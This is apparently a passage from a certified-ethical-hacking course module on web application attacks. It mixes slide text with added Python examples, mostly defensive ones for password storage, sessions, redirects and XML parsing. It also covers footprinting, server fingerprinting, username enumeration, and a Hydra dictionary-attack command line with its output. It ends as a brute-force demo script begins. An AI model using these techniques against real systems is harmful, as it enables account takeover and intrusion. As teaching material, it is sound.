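    return hashlib.md5(password.encode()).hexdigest()


def verify_password_weak(password: str, stored: str) -> bool:
    return store_password_weak(password) == stored


# Hardened side: per-user random salt and a deliberately slow KDF. The stored
# record carries its own parameters so they can be raised later.
ITERATIONS = 600_000


def store_password_strong(password: str, salt: Optional[bytes] = None,
                          iterations: int = ITERATIONS) -> str:
    salt = salt if salt is not None else os.urandom(16)
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return f"pbkdf2_sha256${iterations}${salt.hex()}${dk.hex()}"


def verify_password_strong(password: str, record: str) -> bool:
    algo, iters, salt_hex, dk_hex = record.split("$")
    if algo != "pbkdf2_sha256":
        raise ValueError("unsupported record format")
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(),
                             bytes.fromhex(salt_hex), int(iters))
    # Constant-time compare: no timing side channel on the digest bytes.
    return hmac.compare_digest(dk.hex(), dk_hex)
```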
Broken Authentication and Session Management
An attacker uses vulnerabilities in the authentication or session management functions such as exposed accounts, session IDs, logout, password management, timeouts, remember me, secret question, account update, and others to impersonate users
Broken Authentication and Session Management
Authentication and session management includes every aspect of user authentication and managing active sessions. Yet at times solid authentication also fails due to weak credential functions like password change, forgot my password, remember my password, account update, etc. Utmost care has to be taken related to user authentication. It is always better to use strong authentication methods through special software- and hardware-based cryptographic tokens or biometrics. An attacker uses vulnerabilities in the authentication or session management functions such as exposed accounts, session IDs, logout, password management, timeouts, remember me, secret question, account update, and others to impersonate users.
Session ID in URLs
Example:
http://juggyshop.com/sale/saleitems=304;jsessionid=120MTOIDPXMOOQSABGCKLHCJUN2JV?dest=NewMexico
Timeout Exploitation
If an application's timeouts are not set properly and a user simply closes the browser without logging out from sites accessed through a public computer, the attacker can use the same browser later and exploit the user's privileges.
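An added example (not the module's own code) of a server-side session store that addresses the points above: session IDs are never accepted from URLs, a fresh ID is issued at login so a pre-planted ID (session fixation) never becomes authenticated, idle and absolute timeouts are enforced, and the cookie carries the Secure and HttpOnly attributes so it is not sent over plaintext HTTP or readable by scripts. The cookie name, timeout values and the injectable clock are this example's assumptions.

```python
import secrets
import time
from dataclasses import dataclass
from typing import Callable, Dict, Optional
from urllib.parse import urlsplit

IDLE_TIMEOUT = 15 * 60        # seconds of inactivity before a session expires
ABSOLUTE_TIMEOUT = 8 * 3600   # hard cap on session lifetime, even if active


@dataclass
class Session:
    created: float
    last_seen: float
    user: Optional[str] = None


class SessionStore:
    def __init__(self, now: Callable[[], float] = time.time):
        self._now = now                      # injectable clock (tests)
        self._sessions: Dict[str, Session] = {}

    def create(self) -> str:
        sid = secrets.token_urlsafe(32)      # 256 bits from the OS CSPRNG
        t = self._now()
        self._sessions[sid] = Session(created=t, last_seen=t)
        return sid

    def lookup(self, sid: str) -> Optional[Session]:
        """Return the session only if it exists and neither timeout elapsed."""
        s = self._sessions.get(sid)
        if s is None:
            return None
        now = self._now()
        if now - s.last_seen > IDLE_TIMEOUT or now - s.created > ABSOLUTE_TIMEOUT:
            self.destroy(sid)
            return None
        s.last_seen = now
        return s

    def login(self, presented_sid: str, user: str) -> str:
        """Anti-fixation: whatever ID the client presented is discarded and a
        new one is bound to the authenticated user."""
        self.destroy(presented_sid)
        new_sid = self.create()
        self._sessions[new_sid].user = user
        return new_sid

    def destroy(self, sid: str) -> None:
        self._sessions.pop(sid, None)


def session_id_in_url(url: str) -> bool:
    """Detect the slide's pattern: a session ID carried in the URL path
    (;jsessionid=...) or query string, where it lands in logs and Referers.
    A server should refuse such IDs and only read the cookie."""
    parts = urlsplit(url)
    haystack = (parts.path + "?" + parts.query).lower()
    return any(k in haystack for k in ("jsessionid=", "phpsessid=", "sessionid=", "sid="))


def session_cookie_header(sid: str) -> str:
    """Set-Cookie value: not sent over plain HTTP (Secure), not readable by
    script (HttpOnly), not attached to cross-site requests (SameSite)."""
    return f"SESSIONID={sid}; Path=/; Secure; HttpOnly; SameSite=Lax"
```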
Unvalidated Redirects and Forwards
Unvalidated redirects enable attackers to install malware or trick victims into disclosing passwords or other sensitive information, whereas unsafe forwards may allow access control bypass
Unvalidated Redirects and Forwards
Unsafe forwards may allow access control bypass leading to:
- Session Fixation Attacks
- Security Management Exploits
[Figure: Unvalidated Redirect / Unvalidated Forward. The attacker requests a page from the server with a forward, http://www.juggyshop.com/purchase.jsp?fwd=admin.jsp, and is forwarded to the Administration Page (Create price list, Create item listing, Purchase records, Registered users)]
FIGURE 13.28: Unvalidated Redirects and Forwards
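An added example (not the module's code) of validating a redirect target and a forward target before use. The host www.juggyshop.com and the forward table entries are assumptions; the forward case mirrors the figure's purchase.jsp?fwd=admin.jsp, which a name-to-path table refuses because the caller never supplies a path.

```python
from urllib.parse import urlsplit

SITE_HOST = "www.juggyshop.com"   # assumption: the application's own host


def safe_redirect_target(next_url: str, default: str = "/") -> str:
    """Return a same-site path to redirect to, or the default.

    Rejects absolute URLs to other hosts, protocol-relative targets (//host),
    scheme-bearing targets such as javascript:, and backslash variants that
    some browsers normalise into a host separator."""
    if not next_url or "\\" in next_url or next_url.startswith("//"):
        return default
    parts = urlsplit(next_url)
    if parts.scheme or parts.netloc:
        # Absolute URL: only our own host over https is acceptable, and it is
        # collapsed to a relative path so the scheme/host are never echoed.
        if parts.scheme != "https" or parts.netloc.lower() != SITE_HOST:
            return default
        path = parts.path or "/"
        return path + ("?" + parts.query if parts.query else "")
    if not next_url.startswith("/"):
        return default
    return next_url


# Forwards run inside the server and skip the authorization the target's own
# URL would trigger, so the parameter selects a key, never a file name.
FORWARD_TABLE = {
    "receipt": "/purchase/receipt.jsp",
    "history": "/purchase/history.jsp",
}


def safe_forward_target(fwd_param: str):
    """Map the fwd parameter to a known page, or None if it is not listed."""
    return FORWARD_TABLE.get(fwd_param)
```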
Web Services Architecture
[Figure: web services architecture stack: WS-Work Processes, WS-Federation, WS-SecureConversation, WS-Policy, WS-Trust, WS-Security, SAML, Kerberos, X.509, XML Encryption, Security Token Profiles, XML Digital Signatures, and transports such as .NET TCP Channel, Fast Infoset, etc.]
Web services evolution and its increasing use in business offers new attack vectors in an application framework
Web services are based on XML protocols such as Web Services Definition Language (WSDL) for describing the connection points; Universal Description, Discovery, and Integration (UDDI) for the description and discovery of web services; and Simple Object Access Protocol (SOAP) for communication between web
Web Services Attack
An attacker is using a web service for ordering products, and injects a script to reset the quantity and status on the confirmation page to less than what was originally ordered. In this way, the system processing the order request submits the order, ships the order, and then modifies the order to show that a smaller number of products are being shipped. The attacker winds up receiving more of the product than he or she pays for.
Web Services Footprinting Attack
[Figure: XML Query / XML Response exchanged with the UDDI registry]
Web Services Footprinting Attack
- Business Entity
- Business Service
- Binding Template
- Technical Model (tModel)
FIGURE 13.30: Web Services Footprinting Attack
Web Services XML Poisoning
Attackers insert malicious XML codes in SOAP requests to perform XML node manipulation or XML schema poisoning in order to generate errors in XML parsing logic and break execution logic
Attackers can manipulate XML external entity references that can lead to arbitrary file or TCP connection openings and can be exploited for other web service attacks
XML poisoning enables attackers to cause a denial-of-service attack and compromise confidential information
XML Request:
<CustomerRecord>
<CustomerNumber>2010</CustomerNumber>
<FirstName>Jason</FirstName>
<LastName>Springfield</LastName>
<Address>Apt 20, 3rd Street</Address>
<Email>jason@springfield.com</Email>
<PhoneNumber>6325896325</PhoneNumber>
</CustomerRecord>
Poisoned XML Request:
<CustomerRecord>
<CustomerNumber>2010</CustomerNumber>
<FirstName>Jason</FirstName><CustomerNumber>2010</CustomerNumber>
<FirstName>Jason</FirstName>
<LastName>Springfield</LastName>
<Address>Apt 20, 3rd Street</Address>
<Email>jason@springfield.com</Email>
<PhoneNumber>6325896325</PhoneNumber>
</CustomerRecord>
Web Services XML Poisoning
Attackers insert malicious XML codes in SOAP requests to perform XML node manipulation or XML schema poisoning in order to generate errors in XML parsing logic and break execution logic. Attackers can manipulate XML external entity references that can lead to arbitrary file or TCP connection openings and can be exploited for other web service attacks. XML poisoning enables attackers to cause a denial-of-service attack and compromise confidential information.
FIGURE 13.31: Web Services XML Poisoning
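The following added example (not part of the module) is a strict parser for the CustomerRecord payload of Figure 13.31. It rejects the two classes of poisoning the notes describe: duplicated or unexpected nodes that break the consumer's logic, and any DTD, which is where entity declarations (external references and expansion bombs) live. The field patterns and size limit are this example's assumptions; the two sample documents are constructed to match the slide.

```python
import re
import xml.etree.ElementTree as ET
from typing import Optional

EXPECTED_FIELDS = ("CustomerNumber", "FirstName", "LastName",
                   "Address", "Email", "PhoneNumber")
FIELD_PATTERNS = {
    "CustomerNumber": r"^\d{1,10}$",
    "PhoneNumber": r"^\d{7,15}$",
    "Email": r"^[^@\s<>]+@[^@\s<>]+\.[A-Za-z]{2,}$",
}
MAX_BYTES = 4096


def parse_customer_record(xml_text: str) -> dict:
    """Return the record as a dict, or raise ValueError if it is malformed."""
    if len(xml_text.encode()) > MAX_BYTES:
        raise ValueError("payload too large")
    # Refuse any DTD up front; a SOAP body never needs one.
    if re.search(r"<!(DOCTYPE|ENTITY)", xml_text, re.IGNORECASE):
        raise ValueError("DTD/entity declarations are not allowed")
    try:
        root = ET.fromstring(xml_text)
    except ET.ParseError as exc:
        raise ValueError(f"not well-formed: {exc}") from None
    if root.tag != "CustomerRecord":
        raise ValueError("unexpected root element")
    record = {}
    for child in root:
        if child.tag not in EXPECTED_FIELDS:
            raise ValueError(f"unexpected element <{child.tag}>")
        if child.tag in record or len(child):
            raise ValueError(f"duplicate or nested element <{child.tag}>")
        value = (child.text or "").strip()
        pattern = FIELD_PATTERNS.get(child.tag)
        if pattern and not re.match(pattern, value):
            raise ValueError(f"bad value for <{child.tag}>")
        record[child.tag] = value
    missing = [f for f in EXPECTED_FIELDS if f not in record]
    if missing:
        raise ValueError(f"missing elements: {missing}")
    return record


def rejection_reason(xml_text: str) -> Optional[str]:
    """Convenience wrapper: the error message for a rejected document, else None."""
    try:
        parse_customer_record(xml_text)
    except ValueError as exc:
        return str(exc)
    return None


# Constructed samples mirroring the slide's request and poisoned request.
GOOD_REQUEST = """<CustomerRecord>
<CustomerNumber>2010</CustomerNumber>
<FirstName>Jason</FirstName>
<LastName>Springfield</LastName>
<Address>Apt 20, 3rd Street</Address>
<Email>jason@springfield.com</Email>
<PhoneNumber>6325896325</PhoneNumber>
</CustomerRecord>"""

POISONED_REQUEST = GOOD_REQUEST.replace(
    "<FirstName>Jason</FirstName>",
    "<FirstName>Jason</FirstName><CustomerNumber>2010</CustomerNumber>\n"
    "<FirstName>Jason</FirstName>", 1)
```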
Module Flow
So far, we have discussed web application components and various threats associated with web applications. Now we will discuss web application hacking methodology. A hacking methodology is a way to check every possible way to compromise the web application by attempting to exploit all potential vulnerabilities present in it.
Web App Hacking Methodology
In order to hack a web application, the attacker initially tries to gather as much information as possible about the web infrastructure. Footprinting is one method by which an attacker can gather valuable information about the web infrastructure or web application.
Web infrastructure footprinting is the first step in web application hacking; it helps attackers to select victims and identify vulnerable web applications
- Server Discovery: discover the physical servers that host the web application
- Service Discovery: discover the services running on web servers that can be exploited as attack paths for web app hacking
- Server Identification: grab server banners to identify the make and version of the web server software
- Hidden Content Discovery: extract content and functionality that is not directly linked or reachable from the main visible content
Footprint Web Infrastructure
Web infrastructure footprinting is the first step in web application hacking; it helps attackers to select victims and identify vulnerable web applications. Through web infrastructure footprinting, an attacker can perform:
Server Discovery
In server discovery, when there is an attempt to connect to a server, the redirector makes an incorrect assumption that the root of the URL namespace will be WebDAV-aware. Server discovery finds the physical servers that host the web application.
Service Discovery
Server Identification
Grab the server banners to identify the make and version of the web server software.
Hidden Content Discovery
Footprint Web Infrastructure: Server Discovery
Server discovery gives information about the location of servers and ensures that the target server is alive on the Internet
Whois Lookup Tools: http://www.whois.net, http://e-dns.org, http://www.domaintools.com
Port scanning attempts to connect to a particular set of TCP or UDP ports to find out the services that exist on the server
Port Scanning Tools: Nmap, NetScan Tools Pro, WhatsUp PortScanner Tool, Hping
Footprint Web Infrastructure: Server Discovery
In order to footprint a web infrastructure, first you need to discover the active servers on the Internet. Server discovery gives information about the location of active servers on the Internet. The three techniques, namely whois lookup, DNS interrogation, and port scanning, help in discovering the active servers and their associated information.
Whois Lookup
Whois Lookup is a tool that allows you to gather information about a domain with the help of DNS and WHOIS queries. This produces the result in the form of an HTML report. It is a utility that gives information about the IP address of the web server and DNS names. Some of the Whois Lookup tools are:
- http://www.whois.net
- http://e-dns.org
- http://www.domaintools.com
DNS Interrogation
DNS interrogation is a distributed database that is used by varied organizations to
Port Scanning
Port scanning is a process of scanning the system ports to recognize the open doors. If any unused open port is recognized by an attacker, then he or she can intrude into the system by exploiting it. This method attempts to connect to a particular set of TCP or UDP ports to find out the services that exist on the server. Some of the tools are:
- Nmap
- NetScan Tools Pro
- WhatsUp PortScanner Tool
- Hping
Footprint Web Infrastructure: Service Discovery
Footprint Web Infrastructure: Service Discovery
Port     Typical HTTP Services
80       World Wide Web standard port
81       Alternate WWW
88       Kerberos
443      SSL (https)
900      IBM WebSphere administration client
2301     Compaq Insight Manager
2381     Compaq Insight Manager over SSL
7001     BEA WebLogic
8000     Alternate web server, or web cache
10000    Netscape Administrator interface
TABLE 13.1: Service Discovery
Source: http://nmap.org
Nmap is a scanner that is used to find information about systems and services on a network and to construct a map of the network. It can also determine the different services running on the web server and give detailed information about the remote computers.
[Figure: Zenmap window showing a scan of google.com with 80/tcp open http, 113/tcp closed ident, and 443/tcp open https]
FIGURE 13.32: Zenmap Tool screenshot
Footprint Web Infrastructure: Server Identification/Banner Grabbing
Analyze the server response header field to identify the make, model, and version of the web server software
This information helps attackers to select the exploits from vulnerability databases to attack a web server and applications
Banner grabbing tools:
1. Telnet 2. Netcat 3. ID Serve 4. Netcraft
Footprint Web Infrastructure: Server Identification/Banner Grabbing
Through banner grabbing, an attacker identifies the brand and/or version of a server, an operating system, or an application. Attackers analyze the server response header field to identify the make, model, and version of the web server software. This information helps attackers to select the exploits from vulnerability databases to attack a web server and applications.
C:\>telnet www.juggyboy.com 80
HEAD / HTTP/1.0

Connection to host lost.
C:\>
- Telnet
- Netcat
- ID Serve
- Netcraft
FIGURE 13.33: Server Identification/Banner Grabbing
Footprint Web Infrastructure: Hidden Content Discovery
Discover the hidden content and functionality that is not reachable from the main visible content to exploit user privileges within the application
Footprint Web Infrastructure: Hidden Content Discovery
Web Spidering
Web spiders automatically discover hidden content and functionality by parsing HTML forms and client-side JavaScript requests and responses.
Tools that can be used to discover the hidden content by means of web spidering include:
- OWASP Zed Attack Proxy
- Burp Spider
- WebScarab
Attacker-Directed Spidering
Brute Forcing
Web Spidering Using Burp Suite
[Figure: Burp Suite screenshot of captured requests to www.bing.com, showing the Accept, User-Agent, Referer, Accept-Encoding, Accept-Language and Accept-Charset request headers]
Web Spidering Using Burp Suite
Source: http://www.portswigger.net
Web spidering using Burp Suite is done in the following manner:
3. Browse the target application with JavaScript enabled and disabled, and with cookies enabled and disabled
4. Check the site map generated by the Burp proxy, and identify any hidden application content or functions
5. Continue these steps recursively until no further content or functionality is identified
FIGURE 13.34: Server Identification/Banner Grabbing
Web Spidering Using Mozenda Web Agent Builder
Mozenda Web Agent Builder crawls through a website and harvests pages of information
Web Spidering Using Mozenda Web Agent Builder
Source: http://www.mozenda.com
[Figure: Mozenda Web Agent Builder screenshot. The New Action panel (Click an item, Capture text or image, Choose sort order, Set user input) sits above a product review page; the agent's action list reads Begin Item List, Capture Item Name, Capture Price, Capture Rating, Capture Model, Click Item, End List, then Begin Item List (Review Rating), Capture Review Rating, Capture Review, Capture Would Recommend; a results table shows the harvested Review Rating, Review and Would Recommend columns]
FIGURE 13.35: Web Spidering Using Mozenda Web Agent Builder
Web App Hacking Methodology
Attack Web Servers
Hacking Web Servers
Once the attacker identifies the web server environment, attackers scan for known vulnerabilities by using a web server vulnerability scanner. Vulnerability scanning helps the attacker to launch the attack easily by identifying the exploitable vulnerabilities present on the web server. Once the attacker gathers all the potential vulnerabilities, he or she tries to exploit them with the help of various attack techniques to compromise the web server. In order to stop the web server from serving legitimate users or clients, the attacker launches a DoS attack against the web server. You can launch attacks on the vulnerable web server with the help of tools such as UrlScan, Nikto, Nessus, Acunetix Web Vulnerability Scanner, WebInspect, etc.
Web Server Hacking Tool: WebInspect
WebInspect identifies security vulnerabilities in the web applications
It runs interactive scans using a sophisticated user interface
Web Server Hacking Tool: WebInspect
Source: https://download.hpsmartupdate.com
WebInspect software is web application security assessment software designed to thoroughly analyze today's complex web applications. It delivers fast scanning capabilities, broad assessment coverage, and accurate web application scanning results. It identifies security vulnerabilities that are undetectable by traditional scanners. Attackers can exploit the identified vulnerabilities for launching web services attacks.
[Figure: WebInspect tool screenshot]
FIGURE 13.36: WebInspect Tool Screenshot
Web App Hacking Methodology
Analyze Web Applications
Analyzing the web application helps you in identifying different vulnerable points that can be exploited by the attacker for compromising the web application. Detailed information about analyzing a web application and identifying the entry points to break into the web application will be discussed on the following slides.
Analyze the active application's functionality and technologies in order to identify the attack surfaces that it exposes
Analyze Web Applications
Identify Entry Points for User Input
The entry point of an application serves as an entry point for attacks; these entry points include the front-end web application that listens for HTTP requests. Review the generated HTTP request to identify the user input entry points.
Identify Server-side Functionality
Server-side functionality refers to the ability of a server to execute programs that produce output web pages. These are scripts that reside on particular web servers and allow running interactive web pages or websites. Observe the applications revealed to the client to identify the server-side structure and functionality.
Identify Server-side Technologies
Server-side technologies or server-side scripting refers to the dynamic generation of web pages that are served by the web servers, as opposed to static web pages that are in the storage of the server and served to web browsers. Fingerprint the technologies active on the server using various fingerprinting techniques such as HTTP fingerprinting.
Map the Attack Surface
Identify the various attack surfaces uncovered by the applications and the vulnerabilities that are associated with each one.
Analyze Web Applications: Identify Entry Points for User Input
User Input
During the web application analysis, attackers identify entry points for user input so that they can understand the way the web application accepts or handles the user input. Then the attacker tries to find the vulnerabilities present in the input mechanism and tries to exploit them so that the attacker can associate with or gain access to the web application. Examine the URL, HTTP headers, query string parameters, POST data, and cookies to determine all user input fields.
- Identify HTTP header parameters that can be processed by the application as user inputs such as the User-Agent, Referer, Accept, Accept-Language, and Host headers.
- Determine URL encoding techniques and other encryption measures implemented to secure the web traffic such as SSL.
The tools used to analyze web applications to identify entry points for user input include Burp Suite, HttPrint, WebScarab, OWASP Zed Attack Proxy, etc.
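As an added example (not code from the module), the function below takes one raw HTTP request and enumerates the entry points the list above names: path segments, query string parameters, the user-controlled headers (User-Agent, Referer, Accept, Accept-Language, Host), cookies and form-encoded POST data. This is the inventory a threat model or input-validation review starts from. The sample request is constructed, not a capture.

```python
from urllib.parse import urlsplit, parse_qsl

# Headers the application may read as input (the slide's list plus a few
# that proxies commonly forward). Everything else is treated as transport.
USER_CONTROLLED_HEADERS = {"user-agent", "referer", "accept", "accept-language",
                           "host", "x-forwarded-for", "origin"}


def enumerate_entry_points(raw_request: str) -> dict:
    head, _, body = raw_request.replace("\r\n", "\n").partition("\n\n")
    request_line, *header_lines = head.split("\n")
    method, target, _version = request_line.split(" ", 2)
    headers = {}
    for line in header_lines:
        if ":" in line:
            name, value = line.split(":", 1)
            headers[name.strip().lower()] = value.strip()
    url = urlsplit(target)
    entry = {
        "method": method,
        "path_segments": [s for s in url.path.split("/") if s],
        "query_params": dict(parse_qsl(url.query, keep_blank_values=True)),
        "headers": {k: v for k, v in headers.items() if k in USER_CONTROLLED_HEADERS},
        "cookies": {},
        "body_params": {},
    }
    for pair in headers.get("cookie", "").split(";"):
        if "=" in pair:
            k, v = pair.strip().split("=", 1)
            entry["cookies"][k] = v
    if body and headers.get("content-type", "").startswith("application/x-www-form-urlencoded"):
        entry["body_params"] = dict(parse_qsl(body.strip(), keep_blank_values=True))
    return entry


def count_entry_points(entry: dict) -> int:
    """Number of distinct attacker-influenced values in the request."""
    return (len(entry["path_segments"]) + len(entry["query_params"]) + len(entry["headers"])
            + len(entry["cookies"]) + len(entry["body_params"]))


# Constructed request to juggyboy.com (not a real capture).
SAMPLE_REQUEST = (
    "POST /forum/topic.php?t=1547&start=0 HTTP/1.1\r\n"
    "Host: juggyboy.com\r\n"
    "User-Agent: Mozilla/5.0\r\n"
    "Referer: http://juggyboy.com/forum/\r\n"
    "Accept-Language: en-US\r\n"
    "Cookie: PHPSESSID=abc123; theme=dark\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "Content-Length: 23\r\n"
    "\r\n"
    "subject=hi&message=test"
)
```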
S e r v e r - S id e T e c h n o lo g ie s
» PHPSESSID - PHP
U iw http://juggyboy.com/8rror.aspx
MicrosafMIS/6 0 Microxaft-IISJfl 0
O ops!
Apache;2 0.32 !Fedora)
Server Error in ,/ReportServer' Application.
Couldnotfindthepermissionsetnamed'ASP.Net'.
SunONE Webserver 0 0, Net&c«*pe-Er4e<pr*e/4 1
Description:Anunhandedexceptionoccurredduringthe
executionofthecurrentwebrequest. Pleasereviewthestack
\ 1 traceformoreinformationabouttheerrorandwhereit
Micro* oft-IIS'6.0.0 originatedinthecode.
VersionInformation: Microsoft .Net FrameworkVersion
4.0.30319;ASP.NetVersion4.0.30319.1
'> Server Side Technologies < •
T e c h n o lo g ie s
S o u rc e : h t t p : / / n e t - s q u a r e . c o m
After identifying the entry points through user inputs, attackers try to identify the server-side technologies.
The server-side technologies can be identified as follows:
1. Perform detailed server fingerprinting; analyze HTTP headers and HTML source code to identify server-side technologies.
2. Examine URLs for file extensions, directories, and other identification information.
3. Examine the error page messages.
4. Examine session tokens:
   - JSESSIONID - Java
   - ASPSESSIONID - IIS server (classic ASP)
   - ASP.NET_SessionId - ASP.NET
   - PHPSESSID - PHP
FIGURE 13.37: Identify Server-Side Technologies
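The four signals listed above (headers, URL extension, error text, session-cookie name) can be combined into one fingerprinting routine. The following is an added example, not code from the CEH module or from any of the tools it names. The response it examines is constructed to resemble the juggyboy.com error page in Figure 13.37; the cookie values, the second PHP sample and the small signature tables are illustrative assumptions, not a complete fingerprint database.

```python
"""Infer server-side technologies from a raw HTTP response and its URL.

Added example; the sample responses below are constructed, not captured."""
import re
from typing import Dict, List
from urllib.parse import urlparse

# Session-cookie names from the methodology, mapped to the platform that
# issues them by default.
SESSION_COOKIES: Dict[str, str] = {
    "JSESSIONID": "Java servlet container",
    "ASPSESSIONID": "Classic ASP on IIS",
    "ASP.NET_SessionId": "ASP.NET",
    "PHPSESSID": "PHP",
}
# URL extensions that betray the framework behind a page.
EXTENSIONS: Dict[str, str] = {".aspx": "ASP.NET", ".asp": "Classic ASP",
                              ".jsp": "Java (JSP)", ".php": "PHP",
                              ".do": "Java (Struts)", ".cfm": "ColdFusion"}
# Error-page phrases that identify a stack even when banners are stripped.
ERROR_SIGNATURES: Dict[str, str] = {
    r"Server Error in '.*' Application": "ASP.NET (default error page)",
    r"ASP\.Net Version:?\s*([\d.]+)": "ASP.NET {0}",
    r"Fatal error: .* in .*\.php on line \d+": "PHP (verbose errors on)",
    r"javax\.servlet|java\.lang\.": "Java servlet stack trace",
}


def fingerprint(url: str, raw_response: str) -> List[str]:
    """Return a sorted list of technology findings for one response."""
    head, _, body = raw_response.partition("\r\n\r\n")
    headers: Dict[str, str] = {}
    cookie_names: List[str] = []
    for line in head.split("\r\n")[1:]:          # skip the status line
        name, _, value = line.partition(":")
        name, value = name.strip().lower(), value.strip()
        if name == "set-cookie":
            cookie_names.append(value.split("=", 1)[0])
        else:
            headers[name] = value
    findings = set()
    if "server" in headers:
        findings.add(f"Server header: {headers['server']}")
    if "x-powered-by" in headers:
        findings.add(f"X-Powered-By: {headers['x-powered-by']}")
    for cookie in cookie_names:
        if cookie in SESSION_COOKIES:
            findings.add(f"Cookie {cookie}: {SESSION_COOKIES[cookie]}")
    path = urlparse(url).path.lower()
    for ext, tech in EXTENSIONS.items():
        if path.endswith(ext):
            findings.add(f"URL extension {ext}: {tech}")
    for pattern, tech in ERROR_SIGNATURES.items():
        match = re.search(pattern, body)
        if match:
            findings.add("Error page: " + tech.format(*match.groups()))
    return sorted(findings)


# Constructed sample resembling the ASP.NET error page in Figure 13.37.
SAMPLE_URL = "http://juggyboy.com/error.aspx"
SAMPLE_RESPONSE = (
    "HTTP/1.1 500 Internal Server Error\r\n"
    "Server: Microsoft-IIS/6.0\r\n"
    "X-Powered-By: ASP.NET\r\n"
    "Set-Cookie: ASP.NET_SessionId=constructed0001; path=/; HttpOnly\r\n"
    "Content-Type: text/html\r\n"
    "\r\n"
    "<html><body><h1>Server Error in '/ReportServer' Application.</h1>"
    "<p>Could not find the permission set named 'ASP.Net'.</p>"
    "<p>Version Information: Microsoft .NET Framework Version:4.0.30319; "
    "ASP.Net Version:4.0.30319.1</p></body></html>"
)
# Constructed PHP sample with a verbose fatal error.
PHP_URL = "http://juggyboy.com/index.php"
PHP_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Server: Apache/2.0.32 (Fedora)\r\n"
    "Set-Cookie: PHPSESSID=constructed0002; path=/\r\n"
    "Content-Type: text/html\r\n"
    "\r\n"
    "Fatal error: Call to undefined function foo() in /var/www/index.php on line 12"
)

if __name__ == "__main__":
    for finding in fingerprint(SAMPLE_URL, SAMPLE_RESPONSE):
        print(finding)
```

Run against a real target, the findings should be cross-checked against each other: a mismatch between the Server banner and the session-cookie name often means a reverse proxy or load balancer sits in front of the application server.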
Analyze Web Applications: Identify Server-Side Functionality
Examine page source and URLs and make an educated guess to determine the internal structure and functionality of web applications.
Once the server-side technologies are determined, identify the server-side functionality. This helps you to find the potential vulnerabilities in server-side functionalities. Examine page source and URLs and make an educated guess to determine the internal structure and functionality of web applications.
Tools Used:
Wget
Source: http://www.gnu.org
Teleport Pro
Source: http://www.tenmax.com
Teleport Pro is an all-purpose high-speed tool for getting data from the Internet. Launch up to ten simultaneous retrieval threads, access password-protected sites, filter files by size and type, and search for keywords. Capable of reading HTML 4.0, CSS 2.0, and DHTML, Teleport can find all files available on all websites by means of web spidering with server-side image map exploration, automatic dial-up connecting, Java applet support, variable exploration depths, project scheduling, and relinking abilities.
BlackWidow
Source: http://softbytelabs.com
FIGURE 13.38: BlackWidow (site scan annotated "Examine URL" and "Database Column")
Analyze Web Applications: Map the Attack Surface
There are various entry points for attackers to compromise the network, so proper analysis of the attack surface must be done. Mapping the attack surface includes thorough checking of possible vulnerabilities to launch the attack. The following are the various factors through which an attacker collects the information and plans the kind of attack to be launched.
FIGURE 13.39: Map the Attack Surface (attack surface areas shown on the slide: File Upload and Download, Directory Traversal, Error Message Information Leakage, Display of User-Supplied Data, Cross-Site Scripting, Email Interaction, Email Injection, Dynamic Redirects, Redirection and Header Injection, Application Codes, Buffer Overflows)
Web App Hacking Methodology: Attack Authentication Mechanism
User Name Enumeration
User names can be enumerated in two ways: one is verbose failure messages and the other is predictable user names.
Verbose Failure Message
In a typical login system, the user is required to enter two pieces of information, that is, user name and password. In some cases, an application will ask for some more information. If the user tries to log in and fails, then it can be inferred that at least one of the pieces of information provided by the user is incorrect or inconsistent with the other information provided. If the application discloses which particular piece of information was incorrect or inconsistent, it provides ground for an attacker to exploit the application: every failed attempt then confirms or rules out a user name.
Example:
- "The password provided is incorrect" (confirms that the user name exists)
Predictable User Names
Some applications automatically generate account user names according to some predictable sequence. This makes it very easy for an attacker who can discern the sequence to build a potentially exhaustive list of all valid user names.
Password Attacks
Passwords are cracked based on:
- Password functionality exploits
- Password guessing
- Brute-force attacks
Session Attacks
- Session prediction
- Session brute-forcing
- Session poisoning
Cookie Exploitation
The following are the types of cookie exploitation attacks:
- Cookie poisoning
- Cookie sniffing
- Cookie replay
If the login error states which part of the user name and password is not correct, guess the users of the application using the trial-and-error method.
User Name Enumeration
Source: https://wordpress.com
FIGURE 13.40: User Name Enumeration (two WordPress.com login attempts: "rini.matthews" returns "Username rini.matthews does not exist", while "rinimatthews" does not, so the user name is successfully enumerated as rinimatthews)
Attackers can use an enumerated user name or predict the session identifier to bypass authentication mechanisms.
Password Changing
Password Recovery
Remember Me Exploit
Remember Me functions are implemented using a simple persistent cookie, such as RememberUser=jason, or a persistent session identifier such as RememberUser=ABY112010.
Password Attacks: Password Guessing
Password guessing is a method where an attacker guesses various passwords until he or she gets the correct password, using the following methods: a password list, a password dictionary, and various tools.
Tools Used for Password Guessing
THC-Hydra
Source: http://www.thc.org
THC-Hydra is a network logon cracker that supports many different services. This tool is proof-of-concept code, written to give researchers and security consultants the possibility to show how easy it would be to gain unauthorized remote access to a system.
FIGURE 13.41: THC-Hydra Tool Screenshot (Hydra v4.1 GUI, two runs of the same dictionary attack against FTP on 127.0.0.1: "hydra 127.0.0.1 ftp -l testuser -P /tmp/passlist.txt -e ns" and "hydra 127.0.0.1 ftp -l marc -P /tmp/passlist.txt -e ns -t 32", 32 tasks and 45380 login tries at roughly 14,000 tries per minute, with "Try login as password" and "Try empty password" enabled; result line "[21][ftp] host: 127.0.0.1 login: marc password: success")
Copyright © by EC-Council. All Rights Reserved. Reproduction is Strictly Prohibited.
Password Attacks: Brute Forcing
Brute force is one of the methods used for cracking passwords. In a brute-force attack, attackers crack the login passwords by trying all possible values from a set of alphabetic, numeric, and special characters. The main limitation of the brute-force attack is that it is only practical against short passwords: the number of candidates grows exponentially with the length, so guessing becomes far more expensive when the password is longer and contains both upper and lower case letters. If numbers and symbols are used as well, it might take more than a few years to guess the password, which is practically impossible. Commonly used password cracking tools include Burp Suite's Intruder, Brutus, SensePost's Crowbar, etc.
Burp Suite's Intruder
Source: http://portswigger.net
Burp Intruder is a module of Burp Suite. It enables the user to automate pen testing tasks on web applications, such as sending a login request repeatedly with a different payload each time.
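The three authentication attacks covered in this section (user name enumeration through a verbose failure message, dictionary guessing in the style of Hydra's -e ns option, and brute forcing over a keyspace) can be demonstrated end to end against a mock login. The following is an added example; it is not code from the CEH module, from THC-Hydra or from Burp, and the mock credential store, user names and word list are invented for it. The login functions stand in for the target's login form.

```python
"""Username enumeration, dictionary guessing and brute force against a
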